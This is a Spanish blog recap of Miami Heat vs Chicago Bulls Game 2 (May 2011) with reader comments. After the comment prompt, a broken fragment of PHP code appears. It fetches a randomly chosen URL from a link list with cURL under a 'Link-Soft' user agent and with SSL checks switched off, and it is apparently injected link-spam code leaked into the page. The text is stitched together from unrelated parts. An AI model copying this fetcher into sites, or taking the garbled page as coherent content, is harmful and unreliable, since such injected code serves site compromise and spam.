La Crónica (18/05/2011): El arma secreta de los Heat

19 de May de 2011 por txusma

En el primer partido de la serie uno de los factores que explicaban la victoria de los Bulls era la diferencia en el rebote. Chicago capturó 13 rebotes ofensivos más que su rival lo que otorgó un gran número de segundas oportunidades que supieron aprovechar. Anoche, en cambio, Boozer, Noah y Gibson no supieron sacar réditos de los rebotes ofensivos que consiguieron y además fueron superados en el cómputo global. Incluso permitieron que los Heat anotaran con relativa facilidad cerca del aro. Sin duda, la presencia de Udonis Haslem equilibró la balanza en este aspecto y se antoja decisiva en partidos venideros.

El encuentro en sí no fue un gran partido ofensivamente hablando. El partido llegó al último cuarto igualado a 73 gracias a un arreón de Taj Gibson pero en ese momento llegó la hora de Lebron, al que esta vez Luol Deng no pudo parar. En los últimos 5 minutos anotó 9 puntos por únicamente 2 de los Bulls gracias a un par de tiros libres de Derrick Rose, certificando la victoria de los de Florida.

Con empate a 1 la serie vuela a Miami. Después de este partido, Chicago ya sabe que no puede bajar un ápice su energía ni ofensiva ni defensivamente. No es momento de guardar nada. Si reservan fuerzas lo más probable es que el Big Three les pase por encima.

PREMIOS

MVP: 29 en total, con 9 en los últimos 5 minutos y eso que siempre el aro se hace mucho más pequeño a esas alturas del partidos. Además, 10 rebotes, 5 asistencias y 3 robos. Hablamos, evidentemente, de Lebron James.

Sorpresa: Udonis Haslem puede ser el arma secreta de los Heat en esta serie. Su aportación se antoja decisiva como demuestran los 13 puntos y 5 rebotes de anoche.

Decepción: No es fácil defender a Lebron y además atacar. Debes tener mucha energía para hacer todo correctamente. Luol Deng no pudo cumplir ninguno de sus 2 cometidos, Lebron se fue a los 29 puntos y él se quedó con 13 con un 5 de 15.

Esfuerzo en vano: Derrick Rose fue el mejor de los Bulls con 21 puntos, 6 rebotes y 8 asistencias pero su rendimiento se quedó muy lejos del del primer partido. Ese 7 de 23 no es de recibo.

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. jas dice:
    #1

    Vi solo el ultimo cuarto, rose parecia despistado no supo dirigir a su equipo en los minutos finales, los ataques eran muy previsibles, estaba xupon a la par que fallon,marro 2 tiros libres q hubieran puesto en tablas en el marcador, no se me parece q es l claro termometro de estos bulls si el no funciona los bulls van a menos. A parte vi un poco de indolencia en los rebotes y defensivamente en la pintura y eso que bosh no estaba para tirar cohetes.

      Citar

  2. TheDeerHunter dice:
    #2

    Gran trabajo de Haslem… y también de Miller, del que no se dice nada. Pero tampoco creo que se haya igualado tanto el aspecto reboteador como parece. Los Bulls han cogido poco menos de la tercera parte de los rebotes en la zona de los Heat, pero es que han tirado fatal y han habido muchos rebotes ahí.
    Eso sí, los Heat han cerrado mucho mejor el rebote del otro día.

    Después con el partido igualado menuda pájara en los últimos 6 minutos. Mientras hoy a LeBron le han entrado casi todasa. Ha estado francamente bien, pero no demuestra nada.

    Querría insistir en Haslem. Fundamental en el primer anillo de los Heat y lo será si tienen opciones en este. Perfil gris pero grandísimo jugador, de los que te ganan títulos de tapadillo.
    Mira que me molaría ver una vendetta de Nowitzki con Haslem delante.

      Citar

  3. Vader dice:
    #3

    Pues si, una reedicion de la final Dallas-Miami estaria bien.

    Saludos

      Citar

  4. GreenPride dice:
    #4

    Reacción de los Heat como era de esperar en el segundo partido y empate en la serie. Esta vez tras un comienzo en el que todo parecía igual con los Bulls hinchándose a rebotes ofensivos y segundos tiros y haciendo daño por dentro y con sus contraataques todo cambió a partir de mitad del segundo cuarto. Estaba claro que LeBron y Wade no tendrían otro partido igual de malo y aunque los tiradores de los Heat tampoco estuvieron acertados en este 2º partido los de Miami fueron poco a poco decantando la balanza en el tercer cuarto. El problema para ellos fue que los suplentes de los Bulls son mucho más competentes y volvieron a igualar el partido en el inicio del último cuarto. A partir de ahí llegó la hora de la verdad con empate a 73 y El Rey demostró el por qué de su nombre. En estos playoffs está callando muchas bocas con grandes finales de partidos cuando su equipo lo ha necesitado. En esta ocasión 9 puntos casi consecutivos de LeBron sin prácticamente respuesta de unos Bulls que no tuvieron ningún jugador resolutivo en el final. Como dice la crónica importantísima la vuelta a la vida de Haslem que equilibró el rebote y la energia bajo los aros a partir del segundo cuarto, sin duda será clave en la serie. Los Bulls sin su ventaja bajo los aros y sin que sus tiradores vean aro se encontraron los caminos cerrados para Rose y empezaron a tener graves problemas ofensivos. Veremos cómo sigue la serie en Miami pero yo sigo apostando porque los Beach Boys tienen mas poder en los instantes decisivos de los partidos y que eso les dará la serie

      Citar

  5. Denise dice:
    #5

    Por mucho que Wade lleve toda su vida en Miami, el verdadero jugador franquicia y lider de este equipo es Lebron. Que manera de enchufar y de cargarse el equipo a las espaldas cuando más queman las bolas.
    Apuesto por un Oklahoma-Miami en la final con anillo para los del Este.

      Citar

  6. Javijaen dice:
    #6

    Coincido con la opinión de GreenPride en su mayoría. Solo puntualizar varios datos:
    – En los últimos 7:15 minutos del partido (empate a 73) pasaron casi 3 minutos sin ninguna canasta y los Bulls sólo fueron capaces de meter 2 puntos hasta el final (sí, desde que quedaban 7:15).
    – Haslem, Miller e incluso Bibby y Magloire hoy si dieron la talla cuando se le pidió algo. El resto desaparecido en combate. Ahora, el banquillo de Bulls sigue siendo muy superior.
    – Bogans y Boozer estuvieron muy desaparecidos, y la segunda parte de Rose para olvidar.
    – Aunque defiendan que Lebron es el líder (lo cual no niego), Bosh en el primer cuarto y Wade en el segundo y tercero estuvieron a un grandísimo nivel, sobre todo Wade dinamitando con rapidísimos contraataques la ventaja de Bulls en el primer cuarto.
    En definitiva, serie igualada y si Miami no falla esto no tendrá mucha historia, sobre todo con los arbitrajes caseros, que aunque en este partido no lo fueron excesivamente (se equivocaron mucho por ambos bandos eso sí). Mi pronóstico de final es también Mavs-Heat.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>